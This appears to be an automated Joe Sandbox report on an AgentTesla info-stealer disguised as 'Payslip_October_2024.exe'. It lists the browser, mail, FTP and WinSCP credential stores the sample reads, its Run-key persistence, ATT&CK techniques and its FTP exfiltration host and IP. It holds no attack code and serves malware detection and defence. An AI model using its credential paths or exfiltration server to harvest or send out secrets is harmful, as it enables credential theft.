                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1889661399.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4124052676.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4125026006.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4125026006.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4124052676.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024.exe PID: 7532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024.exe PID: 7692, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 8008, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 6128, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4125026006.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4124052676.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024.exe PID: 7532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024.exe PID: 7692, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 8008, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 6128, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1889661399.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4124052676.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4125026006.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4125026006.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4124052676.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024.exe PID: 7532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024.exe PID: 7692, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 8008, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 6128, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder                    		112
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS211
                    Security Software Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets2
                    Process Discovery                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials141
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                    Process Injection                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1548796 Sample: Payslip_October_2024.exe Startdate: 04/11/2024 Architecture: WINDOWS Score: 100 32 ftp.haliza.com.my 2->32 34 api.ipify.org 2->34 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 9 other signatures 2->58 7 Payslip_October_2024.exe 3 2->7         started        11 sgxIb.exe 3 2->11         started        13 sgxIb.exe 2 2->13         started        signatures3 process4 file5 30 C:\Users\...\Payslip_October_2024.exe.log, ASCII 7->30 dropped 60 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->60 62 Injects a PE file into a foreign processes 7->62 15 Payslip_October_2024.exe 16 5 7->15         started        64 Multi AV Scanner detection for dropped file 11->64 66 Machine Learning detection for dropped file 11->66 20 sgxIb.exe 14 2 11->20         started        22 sgxIb.exe 11->22         started        24 sgxIb.exe 13->24         started        signatures6 process7 dnsIp8 36 ftp.haliza.com.my 110.4.45.197, 21, 49239, 49734 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 15->36 38 api.ipify.org 104.26.12.205, 443, 49733, 49740 CLOUDFLARENETUS United States 15->38 26 C:\Users\user\AppData\Roaming\...\sgxIb.exe, PE32 15->26 dropped 28 C:\Users\user\...\sgxIb.exe:Zone.Identifier, ASCII 15->28 dropped 40 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->40 42 Tries to steal Mail credentials (via file / registry access) 15->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->44 46 Tries to harvest and steal ftp login credentials 24->46 48 Tries to harvest and steal browser information (history, passwords, etc) 24->48 50 Installs a global keyboard hook 24->50 file9 signatures10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Payslip_October_2024.exe32%ReversingLabsWin32.Trojan.Generic
                    Payslip_October_2024.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe32%ReversingLabsWin32.Trojan.AgentTesla

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.microsoft.cogu70%Avira URL Cloudsafe
                    http://www.sakkal.comP;0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		high
                      ftp.haliza.com.my
                      		110.4.45.197
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.comPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersGPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bThePayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://account.dyn.com/Payslip_October_2024.exe, 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designers?Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.tiro.comPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designersPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.goodfont.co.krPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.ipify.org/tPayslip_October_2024.exe, 00000002.00000002.4125026006.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1889661399.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.sakkal.comP;Payslip_October_2024.exe, 00000000.00000002.1680417478.0000000005EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.carterandcone.comlPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.sajatypeworks.comPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.typography.netDPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers/cabarga.htmlNPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn/cThePayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.galapagosdesign.com/staff/dennis.htmPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.ipify.orgPayslip_October_2024.exe, 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1889661399.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cnPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.com/designers/frere-user.htmlPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://ftp.haliza.com.myPayslip_October_2024.exe, 00000002.00000002.4125026006.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1889661399.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.jiyu-kobo.co.jp/Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.galapagosdesign.com/DPleasePayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.fontbureau.com/designers8Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.fonts.comPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.sandoll.co.krPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.urwpp.deDPleasePayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.zhongyicts.com.cnPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayslip_October_2024.exe, 00000002.00000002.4125026006.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1889661399.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.sakkal.comPayslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.microsoft.cogu7sgxIb.exe, 00000005.00000002.1895502014.00000000063A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      104.26.12.205
                                                                                      		api.ipify.orgUnited States
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      110.4.45.197
                                                                                      		ftp.haliza.com.myMalaysia
                                                                                      		46015EXABYTES-AS-APExaBytesNetworkSdnBhdMYtrue

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1548796
                                                                                      Start date and time:2024-11-04 21:24:03 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 9m 31s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:12
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:Payslip_October_2024.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@11/4@2/2
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 99%
                                                                                      • Number of executed functions: 346
                                                                                      • Number of non-executed functions: 32
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • VT rate limit hit for: Payslip_October_2024.exe

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      15:24:52API Interceptor6516619x Sleep call for process: Payslip_October_2024.exe modified
                                                                                      15:25:06API Interceptor5479711x Sleep call for process: sgxIb.exe modified
                                                                                      20:24:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                      20:25:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      104.26.12.205Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                      • api.ipify.org/
                                                                                      perfcc.elfGet hashmaliciousXmrigBrowse
                                                                                      • api.ipify.org/
                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      110.4.45.197Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          Payslip_October_2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          api.ipify.orgCFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                          • 104.26.13.205
                                                                                                          CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                          • 104.26.13.205
                                                                                                          2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.74.152
                                                                                                          2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.13.205
                                                                                                          Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.74.152
                                                                                                          Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 172.67.74.152
                                                                                                          Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          Copia de pago de la Orden de compra OI16014 y OI16015.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.12.205
                                                                                                          QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 172.67.74.152
                                                                                                          Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          ftp.haliza.com.myPayslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
